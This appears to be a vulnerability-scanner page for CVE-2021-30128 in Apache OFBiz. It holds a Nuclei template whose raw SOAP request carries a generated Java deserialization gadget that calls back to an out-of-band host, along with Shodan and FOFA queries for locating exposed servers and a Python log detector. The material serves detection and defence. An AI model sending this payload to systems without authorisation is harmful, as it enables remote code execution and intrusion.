Apache OFBiz <17.12.07 - Arbitrary Code Execution
ID: CVE-2021-30128
Severity: critical
Author: For3stCo1d
Tags: cve2021,cve,apache,ofbiz,deserialization,rce
Description
Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. An attacker can modify deserialized data or code without using provided accessor functions.
YAML Source
id: CVE-2021-30128

info:
  name: Apache OFBiz <17.12.07 - Arbitrary Code Execution
  author: For3stCo1d
  severity: critical
  description: Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. An attacker can modify deserialized data or code without using provided accessor functions.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade Apache OFBiz to version 17.12.07 or later to mitigate this vulnerability.
  reference:
    - https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E
    - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E
    - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743@%3Cdev.ofbiz.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2021-30128
    - http://www.openwall.com/lists/oss-security/2021/04/27/5
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-30128
    cwe-id: CWE-502
    epss-score: 0.59411
    epss-percentile: 0.97756
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: ofbiz
    shodan-query:
      - http.html:"ofbiz"
      - ofbiz.visitor=
    fofa-query:
      - app="Apache_OFBiz"
      - body="ofbiz"
      - app="apache_ofbiz"
  tags: cve2021,cve,apache,ofbiz,deserialization,rce

http:
  - raw:
      - |
        POST /webtools/control/SOAPService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
          <soapenv:Header/>
          <soapenv:Body>
            <ser>
              <map-Map>
                <map-Entry>
                  <map-Key>
                    <cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</cus-obj>
                  </map-Key>
                  <map-Value>
                    <std-String/>
                  </map-Value>
                </map-Entry>
              </map-Map>
            </ser>
          </soapenv:Body>
        </soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - 'value="errorMessage"'
# digest: 4b0a00483046022100895e3b285657798274c14437a1e20dfb59c46e1d6d8c3ab2157901cb980da53902210090ac40b1438654f2c302c4e6525145e42a8b7cf1150e251f2dc6b36193b90e84:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects CVE-2021-30128 in Apache OFBiz web applications. Run it with the Nuclei tool against the URL you want to check:
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-30128.yaml"
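For the defending side, the request in the template suggests a log or proxy check: a POST to `/webtools/control/SOAPService` whose `<cus-obj>` element carries a hex-encoded Java serialized stream. The following is an added example, not part of the template or of OFBiz; the function names and sample bodies are constructed, and it assumes request bodies are available for inspection.

```python
import re

# Java object serialization streams start with magic 0xACED and version 0x0005.
JAVA_SER_MAGIC = bytes.fromhex("aced0005")
SOAP_PATH = "/webtools/control/SOAPService"  # endpoint used by the template
# <cus-obj> element, tolerating a namespace prefix and attributes.
CUS_OBJ = re.compile(
    r"<(?:[\w.-]+:)?cus-obj\b[^>]*>(.*?)</(?:[\w.-]+:)?cus-obj\s*>", re.DOTALL
)


def serialized_payload_sizes(body: str) -> list[int]:
    """Byte length of each <cus-obj> whose hex content is a Java serialized stream."""
    sizes = []
    for text in CUS_OBJ.findall(body):
        try:
            raw = bytes.fromhex("".join(text.split()))
        except ValueError:
            continue  # not hex, so not the encoding the template sends
        if raw.startswith(JAVA_SER_MAGIC):
            sizes.append(len(raw))
    return sizes


def is_suspicious(method: str, path: str, body: str) -> bool:
    """Flag POSTs to the SOAP endpoint that carry a serialized Java object."""
    on_endpoint = path.split("?", 1)[0].rstrip("/") == SOAP_PATH
    return method.upper() == "POST" and on_endpoint and bool(serialized_payload_sizes(body))


def envelope(key_xml: str) -> str:
    """Build a constructed SOAP body with the same element layout as the template."""
    return (
        '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
        "<soapenv:Body><ser><map-Map><map-Entry><map-Key>" + key_xml + "</map-Key>"
        "<map-Value><std-String/></map-Value></map-Entry></map-Map></ser>"
        "</soapenv:Body></soapenv:Envelope>"
    )


# Constructed samples, not captured traffic. The hex is the serialized form of
# the Java String "test" (harmless), used only to exercise the magic-byte check.
SAMPLE_FLAGGED = envelope("<cus-obj>aced000574000474657374</cus-obj>")
SAMPLE_BENIGN = envelope('<std-String value="orderId"/>')

if __name__ == "__main__":
    for name, body in (("flagged", SAMPLE_FLAGGED), ("benign", SAMPLE_BENIGN)):
        print(name, is_suspicious("POST", SOAP_PATH, body), serialized_payload_sizes(body))
```

A hit means a serialized object reached the endpoint, not that exploitation succeeded; the remediation stated in the template (upgrade to 17.12.07 or later) is what closes the issue.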